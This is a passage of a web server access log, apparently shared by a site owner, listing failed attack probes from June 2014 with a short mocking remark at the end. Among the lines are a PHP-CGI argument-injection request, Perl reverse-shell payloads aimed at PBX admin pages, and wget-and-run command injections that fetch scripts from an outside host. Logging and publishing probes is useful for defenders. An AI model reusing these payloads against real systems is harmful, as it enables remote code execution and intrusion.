  249. 0.0.0.5 - - [17/Jun/2014:23:59:04 +0400] "POST /cgi-bin/php4?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 404 177 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
  250. 0.0.0.6 - - [18/Jun/2014:05:05:54 +0400] "GET /vtigercrm/vtigerservice.php HTTP/1.1" 404 177 "-" "curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.14.0.0 zlib/1.2.3 libidn/1.18 libssh2/1.4.2"
  251. 0.0.0.7 - - [19/Jun/2014:04:09:02 +0400] "GET /vtigercrm/vtigerservice.php HTTP/1.1" 404 177 "-" "curl/7.15.5 (x86_64-redhat-linux-gnu) libcurl/7.15.5 OpenSSL/0.9.8b zlib/1.2.3 libidn/0.6.5"
  252.  
  253. ################################################################################
  254. @ 108.62.104.39 / Miscellaneous @
  255. ================================================================================
  256. 0.0.0.3 - - [15/Jun/2014:12:03:09 +0400] "GET /recordings/locale/sv_SE/LC_MESSAGES/LC/index.php HTTP/1.1" 404 177 "-" "-"
  257. 0.0.0.3 - - [15/Jun/2014:12:03:20 +0400] "GET /fuxkkk.php HTTP/1.1" 404 177 "-" "-"
  258. 0.0.0.3 - - [15/Jun/2014:12:03:21 +0400] "GET /recordings/theme/alexpass.php HTTP/1.1" 404 177 "-" "-"
  259. 0.0.0.3 - - [15/Jun/2014:12:04:29 +0400] "POST /admin/assets/index.php HTTP/1.1" 404 177 "-" "-"
  260. 0.0.0.3 - - [15/Jun/2014:12:08:19 +0400] "GET /admin/footer.php?php=info&ip=perl%20-MIO%20-e%20%27%24p%3Dfork%3Bexit%2Cif(%24p)%3B%20%24c%3Dnew%20IO%3A%3ASocket%3A%3AINET(PeerAddr%2C%220.0.0.3%3A3333%22)%3B%20STDIN-%3Efdopen(%24c%2Cr)%3B%20%24~-%3Efdopen(%24c%2Cw)%3B%20%24c-%3Ewrite(%22%5DQAfH%23.Eq%5Cnunk%5Cn%22)%3B%20system%24_%20while%3C%3E%3B%27 HTTP/1.1" 404 177 "-" "-"
  261. 0.0.0.3 - - [15/Jun/2014:12:08:20 +0400] "GET /admin/Y-ivrrecording.php?php=info&ip=perl%20-MIO%20-e%20%27%24p%3Dfork%3Bexit%2Cif(%24p)%3B%20%24c%3Dnew%20IO%3A%3ASocket%3A%3AINET(PeerAddr%2C%220.0.0.3%3A3333%22)%3B%20STDIN-%3Efdopen(%24c%2Cr)%3B%20%24~-%3Efdopen(%24c%2Cw)%3B%20%24c-%3Ewrite(%22%5DQAfH%23.Eq%5Cnunk%5Cn%22)%3B%20system%24_%20while%3C%3E%3B%27 HTTP/1.1" 404 177 "-" "-"
  262. 0.0.0.3 - vampire [15/Jun/2014:12:08:30 +0400] "POST /admin/assets/themes/case.php?act=tools&d=%2Ftmp HTTP/1.1" 404 177 "-" "-"
  263. 0.0.0.3 - vampire [15/Jun/2014:12:08:31 +0400] "POST /recordings/vamp/case.php?act=tools&d=%2Ftmp HTTP/1.1" 404 177 "-" "-"
  264. 0.0.0.3 - - [15/Jun/2014:12:09:12 +0400] "GET /recordings/misc/callme_page.php?action=c&callmenum=888%40ext-featurecodes%2Fn%0D%0AApplication%3A%20system%0D%0AData%3A%20perl%20-MIO%20-e%20%27%24p%3Dfork%3Bexit%2Cif(%24p)%3B%20%24c%3Dnew%20IO%3A%3ASocket%3A%3AINET(PeerAddr%2C%220.0.0.3%3A3333%22)%3B%20STDIN-%3Efdopen(%24c%2Cr)%3B%20%24~-%3Efdopen(%24c%2Cw)%3B%20%24c-%3Ewrite(%22%5DQAfH%23.Eq%5Cncmp%5Cn%22)%3B%20system%24_%20while%3C%3E%3B%27%0D%0A%0D%0A HTTP/1.1" 404 177 "-" "-"
  265. 0.0.0.3 - - [15/Jun/2014:12:09:13 +0400] "GET /recordings/misc/callme_page.php?action=c&callmenum=555%40ext-featurecodes%2Fn%0D%0AApplication%3A%20system%0D%0AData%3A%20perl%20-MIO%20-e%20%27%24p%3Dfork%3Bexit%2Cif(%24p)%3B%20%24c%3Dnew%20IO%3A%3ASocket%3A%3AINET(PeerAddr%2C%220.0.0.3%3A3333%22)%3B%20STDIN-%3Efdopen(%24c%2Cr)%3B%20%24~-%3Efdopen(%24c%2Cw)%3B%20%24c-%3Ewrite(%22%5DQAfH%23.Eq%5Cncmp%5Cn%22)%3B%20system%24_%20while%3C%3E%3B%27%0D%0A%0D%0A HTTP/1.1" 404 177 "-" "-"
  266. 0.0.0.3 - - [15/Jun/2014:12:09:15 +0400] "GET /recordings/misc/thaer.php?action=c&callmenum=888%40ext-featurecodes%2Fn%0D%0AApplication%3A%20system%0D%0AData%3A%20perl%20-MIO%20-e%20%27%24p%3Dfork%3Bexit%2Cif(%24p)%3B%20%24c%3Dnew%20IO%3A%3ASocket%3A%3AINET(PeerAddr%2C%220.0.0.3%3A3333%22)%3B%20STDIN-%3Efdopen(%24c%2Cr)%3B%20%24~-%3Efdopen(%24c%2Cw)%3B%20%24c-%3Ewrite(%22%5DQAfH%23.Eq%5Cncmp%5Cn%22)%3B%20system%24_%20while%3C%3E%3B%27%0D%0A%0D%0A HTTP/1.1" 404 177 "-" "-"
  267. 0.0.0.3 - - [15/Jun/2014:12:13:20 +0400] "GET /admin/config.php?display=auth&handler=api&function=system&args=cd%20/tmp;rm%20-f%20e;wget%20http://0.0.0.3:3003/e;perl%20e;rm%20-f%20e HTTP/1.1" 404 177 "-" "-"
  268. 0.0.0.3 - - [15/Jun/2014:12:13:31 +0400] "GET /admin/modules/backup/page.backup.php?action=deletedataset&dir=%27;cd%20/tmp;rm%20-f%20c;wget%20http://0.0.0.3:3003/c;perl%20c;rm%20-f%20c;%27 HTTP/1.1" 404 177 "-" "-"
  269. 0.0.0.3 - - [15/Jun/2014:12:18:46 +0400] "POST /vtigercrm/graph.php?module=..%2Fmodules%2FSettings&action=savewordtemplate HTTP/1.1" 404 177 "-" "-"
  270. 0.0.0.8 - - [15/Jun/2014:14:20:27 +0400] "GET /wp-login.php HTTP/1.1" 404 151 "http://victussw.com/wp-login.php" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0"
  271. 0.0.0.9 - - [15/Jun/2014:14:20:27 +0400] "GET /wp-login.php HTTP/1.1" 404 151 "http://victussoftworks.com/wp-login.php" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0"
  272. 0.0.1.0 - - [15/Jun/2014:14:28:26 +0400] "GET /manager/html HTTP/1.1" 404 177 "-" "Mozilla/3.0 (compatible; Indy Library)"
  273. 0.0.1.1 - - [15/Jun/2014:16:43:04 +0400] "GET /muieblackcat HTTP/1.1" 404 151 "-" "-"
  274. 0.0.1.1 - - [15/Jun/2014:16:43:05 +0400] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 404 151 "-" "-"
  275. 0.0.1.1 - - [15/Jun/2014:16:43:06 +0400] "GET //myadmin/scripts/setup.php HTTP/1.1" 404 151 "-" "-"
  276. 0.0.1.1 - - [15/Jun/2014:16:43:07 +0400] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 404 151 "-" "-"
  277. 0.0.1.1 - - [15/Jun/2014:16:43:08 +0400] "GET //mysqladmin/scripts/setup.php HTTP/1.1" 404 151 "-" "-"
  278. 0.0.1.1 - - [15/Jun/2014:16:43:08 +0400] "GET //mysql/scripts/setup.php HTTP/1.1" 404 151 "-" "-"
  279. 0.0.1.1 - - [15/Jun/2014:16:43:09 +0400] "GET //pma/scripts/setup.php HTTP/1.1" 404 151 "-" "-"
  280. 0.0.1.1 - - [15/Jun/2014:16:43:10 +0400] "GET //web/scripts/setup.php HTTP/1.1" 404 151 "-" "-"
  281. 0.0.1.1 - - [15/Jun/2014:16:43:10 +0400] "GET //websql/scripts/setup.php HTTP/1.1" 404 151 "-" "-"
  282. 0.0.1.1 - - [15/Jun/2014:16:43:11 +0400] "GET //sql/scripts/setup.php HTTP/1.1" 404 151 "-" "-"
  283. 0.0.1.1 - - [15/Jun/2014:16:43:12 +0400] "GET //MyAdmin/scripts/setup.php HTTP/1.1" 404 151 "-" "-"
  284. 0.0.1.1 - - [15/Jun/2014:16:43:13 +0400] "GET //PHPMYADMIN/scripts/setup.php HTTP/1.1" 404 151 "-" "-"
  285. 0.0.1.1 - - [15/Jun/2014:16:43:13 +0400] "GET //phpAdmin/scripts/setup.php HTTP/1.1" 404 151 "-" "-"
  286. 0.0.1.1 - - [15/Jun/2014:16:43:14 +0400] "GET //pMA/scripts/setup.php HTTP/1.1" 404 151 "-" "-"
  287. 0.0.1.1 - - [15/Jun/2014:16:43:15 +0400] "GET //PMA/scripts/setup.php HTTP/1.1" 404 151 "-" "-"
  288. 0.0.1.1 - - [15/Jun/2014:16:43:15 +0400] "GET //pma/scripts/setup.php HTTP/1.1" 404 151 "-" "-"
  289. 0.0.1.1 - - [15/Jun/2014:16:43:16 +0400] "GET //MySQLAdmin/scripts/setup.php HTTP/1.1" 404 151 "-" "-"
  290. 0.0.1.1 - - [15/Jun/2014:16:43:16 +0400] "GET //pHpMyAdMiN/scripts/setup.php HTTP/1.1" 404 151 "-" "-"
  291. 0.0.1.2 - - [15/Jun/2014:21:33:24 +0400] "GET /manager/html HTTP/1.1" 404 177 "-" "Mozilla/3.0 (compatible; Indy Library)"
  292. 0.0.1.3 - - [15/Jun/2014:21:44:02 +0400] "GET /phpTest/zologize/axa.php HTTP/1.1" 404 177 "-" "-"
  293. 0.0.1.3 - - [15/Jun/2014:21:44:03 +0400] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 177 "-" "-"
  294. 0.0.1.3 - - [15/Jun/2014:21:44:04 +0400] "GET /pma/scripts/setup.php HTTP/1.1" 404 177 "-" "-"
  295. 0.0.1.3 - - [15/Jun/2014:21:44:04 +0400] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 177 "-" "-"
  296. 0.0.1.4 - - [15/Jun/2014:23:43:26 +0400] "GET http://hotel.qunar.com/render/hoteldiv.jsp?&__jscallback=XQScript_4 HTTP/1.1" 404 208 "http://hotel.qunar.com/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36"
  297. 0.0.1.1 - - [15/Jun/2014:23:50:49 +0400] "GET /muieblackcat HTTP/1.1" 404 151 "-" "-"
  298. 0.0.1.1 - - [15/Jun/2014:23:50:50 +0400] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 404 151 "-" "-"
  299. 0.0.1.1 - - [15/Jun/2014:23:50:50 +0400] "GET //myadmin/scripts/setup.php HTTP/1.1" 404 151 "-" "-"
  300. 0.0.1.1 - - [15/Jun/2014:23:50:51 +0400] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 404 151 "-" "-"
  301. 0.0.1.1 - - [15/Jun/2014:23:50:51 +0400] "GET //mysqladmin/scripts/setup.php HTTP/1.1" 404 151 "-" "-"
  302. 0.0.1.1 - - [15/Jun/2014:23:50:54 +0400] "GET //sql/scripts/setup.php HTTP/1.1" 404 151 "-" "-"
  303. 0.0.1.1 - - [15/Jun/2014:23:50:54 +0400] "GET //web/scripts/setup.php HTTP/1.1" 404 151 "-" "-"
  304. 0.0.1.1 - - [15/Jun/2014:23:50:54 +0400] "GET //PMA/scripts/setup.php HTTP/1.1" 404 151 "-" "-"
  305. 0.0.1.1 - - [15/Jun/2014:23:50:54 +0400] "GET //pMA/scripts/setup.php HTTP/1.1" 404 151 "-" "-"
  306. 0.0.1.1 - - [15/Jun/2014:23:50:54 +0400] "GET //pma/scripts/setup.php HTTP/1.1" 404 151 "-" "-"
  307. 0.0.1.1 - - [15/Jun/2014:23:50:54 +0400] "GET //MySQLAdmin/scripts/setup.php HTTP/1.1" 404 151 "-" "-"
  308. 0.0.1.1 - - [15/Jun/2014:23:50:54 +0400] "GET //phpAdmin/scripts/setup.php HTTP/1.1" 404 151 "-" "-"
  309. 0.0.1.1 - - [15/Jun/2014:23:50:54 +0400] "GET //MyAdmin/scripts/setup.php HTTP/1.1" 404 151 "-" "-"
  310. 0.0.1.1 - - [15/Jun/2014:23:50:54 +0400] "GET //PHPMYADMIN/scripts/setup.php HTTP/1.1" 404 151 "-" "-"
  311. 0.0.1.1 - - [15/Jun/2014:23:50:54 +0400] "GET //websql/scripts/setup.php HTTP/1.1" 404 151 "-" "-"
  312. 0.0.1.1 - - [15/Jun/2014:23:50:54 +0400] "GET //pHpMyAdMiN/scripts/setup.php HTTP/1.1" 404 151 "-" "-"
  313. 0.0.1.1 - - [15/Jun/2014:23:50:54 +0400] "GET //pma/scripts/setup.php HTTP/1.1" 404 151 "-" "-"
  314. 0.0.1.5 - - [16/Jun/2014:00:45:49 +0400] "GET /xmlrpc.php HTTP/1.1" 404 177 "-" "-"
  315. 0.0.1.6 - admin [16/Jun/2014:01:49:51 +0400] "GET /manager/html HTTP/1.1" 404 151 "-" "-"
  316. 0.0.1.5 - - [16/Jun/2014:08:39:47 +0400] "GET /xmlrpc.php HTTP/1.1" 400 181 "-" "-"
  317. 0.0.1.7 - - [16/Jun/2014:11:36:23 +0400] "GET http://itrobot.ru/proxy/?ip=0.0.1.7&token=fgKh5 HTTP/1.1" 404 151 "-" "Mozilla/5.0 (Windows NT 5.1) Gecko/20100101 Firefox/4.0.1"
  318. 0.0.1.8 - - [16/Jun/2014:12:23:55 +0400] "GET /phpTest/zologize/axa.php HTTP/1.1" 404 177 "-" "-"
  319. 0.0.1.8 - - [16/Jun/2014:12:23:55 +0400] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 177 "-" "-"
  320. 0.0.1.8 - - [16/Jun/2014:12:23:56 +0400] "GET /pma/scripts/setup.php HTTP/1.1" 404 177 "-" "-"
  321. 0.0.1.8 - - [16/Jun/2014:12:23:56 +0400] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 177 "-" "-"
  322. 0.0.1.9 - - [16/Jun/2014:12:59:02 +0400] "HEAD /webdav/ HTTP/1.1" 400 0 "-" "-"
  323. 0.0.2.0 - - [16/Jun/2014:19:38:12 +0400] "" 400 0 "-" "-"
  324. 0.0.1.5 - - [17/Jun/2014:01:29:44 +0400] "GET /xmlrpc.php HTTP/1.1" 400 181 "-" "-"
  325. 0.0.1.2 - - [17/Jun/2014:10:19:27 +0400] "GET /manager/html HTTP/1.1" 404 177 "-" "Mozilla/3.0 (compatible; Indy Library)"
  326. 0.0.1.2 - - [17/Jun/2014:21:22:33 +0400] "GET /manager/html HTTP/1.1" 404 177 "-" "Mozilla/3.0 (compatible; Indy Library)"
  327. 0.0.0.6 - - [18/Jun/2014:05:05:54 +0400] "\x16\x03\x01\x00K\x01\x00\x00G\x03\x01S\xA0\xF4\x02c\xCCf\xCA\xF7\xC7\x08" 400 181 "-" "-"
  328. 0.0.2.1 - - [18/Jun/2014:16:16:43 +0400] "GET /admin/ HTTP/1.1" 404 151 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)"
  329. 0.0.2.2 - - [18/Jun/2014:16:30:40 +0400] "GET /phpTest/zologize/axa.php HTTP/1.1" 404 177 "-" "-"
  330. 0.0.2.2 - - [18/Jun/2014:16:30:41 +0400] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 177 "-" "-"
  331. 0.0.2.2 - - [18/Jun/2014:16:30:41 +0400] "GET /pma/scripts/setup.php HTTP/1.1" 404 177 "-" "-"
  332. 0.0.2.2 - - [18/Jun/2014:16:30:41 +0400] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 177 "-" "-"
  333. 0.0.2.3 - - [19/Jun/2014:03:15:05 +0400] "\x22GET /cgi-bin/php HTTP/1.0 " 400 181 "-" "-"
  334. 0.0.2.4 - - [19/Jun/2014:16:58:37 +0400] "GET /phpTest/zologize/axa.php HTTP/1.1" 404 177 "-" "-"
  335. 0.0.2.4 - - [19/Jun/2014:16:58:37 +0400] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 177 "-" "-"
  336. 0.0.2.4 - - [19/Jun/2014:16:58:38 +0400] "GET /pma/scripts/setup.php HTTP/1.1" 404 177 "-" "-"
  337. 0.0.2.4 - - [19/Jun/2014:16:58:38 +0400] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 177 "-" "-"
  338.  
  339. {{{
  340. In closing, just LOL. Keep trying, I'll keep posting. Some of the
  341. tricks, while a dead end with my website, will probably work on
  342. other setups (shitty PHP scripts, broken server config, etc. You
  343. know, business as usual!).
  344. }}}
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement